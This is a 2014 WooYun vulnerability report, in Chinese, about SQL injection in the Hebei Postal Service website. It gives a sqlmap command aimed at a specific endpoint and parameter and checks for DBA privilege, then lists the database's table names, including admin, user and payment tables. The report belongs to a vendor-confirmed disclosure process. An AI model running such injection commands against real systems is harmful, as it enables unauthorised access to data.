当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076447

漏洞标题:河北邮政SQL注入(SqlServer+dba)

相关厂商:中国邮政集团公司信息技术局

漏洞作者: Mody

提交时间:2014-09-18 14:44

修复时间:2014-11-02 14:46

公开时间:2014-11-02 14:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-18: 细节已通知厂商并且等待厂商处理中
2014-09-18: 厂商已经确认,细节仅向厂商公开
2014-09-28: 细节向核心白帽子及相关领域专家公开
2014-10-08: 细节向普通白帽子公开
2014-10-18: 细节向实习白帽子公开
2014-11-02: 细节向公众公开

简要描述:

两个月没挖洞了,实在是缺rank了。。。
过一阵子把这两个月憋的大放出来

详细说明:

贴图吧。。

1.JPG

漏洞证明:

sqlmap>python sqlmap.py -u "http://www.hepost.com/system/sysSet
up/filesManage.aspx?type=list" --data="fType=(select 1)" --referer="http://www.h
epost.com/system/sysSetup/filesManage.htm?fileSize=3" -p fType --is-dba

2.jpg


+--------------------------+
| Admin |
| Ip_Limit |
| Site |
| Ss_Art |
| Ss_Group |
| Ss_List |
| User |
| tab_BSZN |
| tab_CJ |
| tab_GZCX |
| tab_IMAGE |
| tab_LY |
| tab_MAIL |
| tab_Music |
| tab_News |
| tab_Registration |
| tab_Results |
| tab_SGSZ |
| tab_Survey |
| tab_USERPHOTO |
| tab_articledown |
| tab_diary |
| tab_groupDay |
| tab_groupMusic |
| tab_groupPhoto |
| tab_lgq |
| tab_note |
| tab_pepole |
| tab_qzlx |
| tab_sAndD |
| tab_shop |
| tab_soft |
| tab_softdown |
| tab_transaction |
| tab_userMusic |
| tab_userday |
| tab_video |
| tab_webService |
| tab_zmydy |
| wx_SummaryConfig |
| wx_prometoResoult |
| wx_promot |
| wx_receiveAward |
| zydn_Address |
| zydn_BBSMain |
| zydn_BBSRe |
| zydn_Backup |
| zydn_BbsLog |
| zydn_Competence |
| zydn_Config |
| zydn_ConfigUser |
| zydn_Config_Field |
| zydn_Config_Input |
| zydn_Config_MenuInt |
| zydn_Config_MenuPower |
| zydn_Config_Tab |
| zydn_Count |
| zydn_Count_DayIP |
| zydn_Count_DayJsIP |
| zydn_Desktop |
| zydn_EmailTemplates |
| zydn_ExChange |
| zydn_ExChangeIndex |
| zydn_ExChangeMoney |
| zydn_Favorite |
| zydn_FindKey |
| zydn_Grade |
| zydn_LabelClass |
| zydn_Log |
| zydn_Menu |
| zydn_Msg |
| zydn_OrderList |
| zydn_OrderType |
| zydn_Parameter |
| zydn_Program |
| zydn_Shop_MidKey |
| zydn_Shop_PayList |
| zydn_Source |
| zydn_Tab_Base |
| zydn_UpFile |
| zydn_UserGroup |
| zydn_User_Base |
| zydn_User_extend |
| zydn_applyExamineHostory |
| zydn_applyProjectBase |
| zydn_applyProjectFor |
| zydn_applyProjectSubject |
| zydn_applyRapidResponse |
| zydn_applySubjectClass |
| zydn_area |
| zydn_bunchBase |
| zydn_bunchCompetence |
| zydn_bunchUser |
| zydn_contribute |
| zydn_friend |
| zydn_ip |
| zydn_label |
| zydn_labelType |
| zydn_optionList |
| zydn_orderDeliver |
| zydn_orderListLog |
| zydn_review |
| zydn_room |
| zydn_setPlan |
| zydn_signFor |
| zydn_tabInt |
| zydn_tender |
| zydn_type |
| zydn_typeMenu |
| zydn_uModiContent |
| zydn_useInt |
| zydn_userLevel |
| zydn_vot |
| zydn_web |
+--------------------------+

修复方案:

过滤呀,给高点rank啵

版权声明:转载请注明来源 Mody@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-09-18 17:05

厂商回复:

谢谢

最新状态:

暂无


漏洞评价:

评论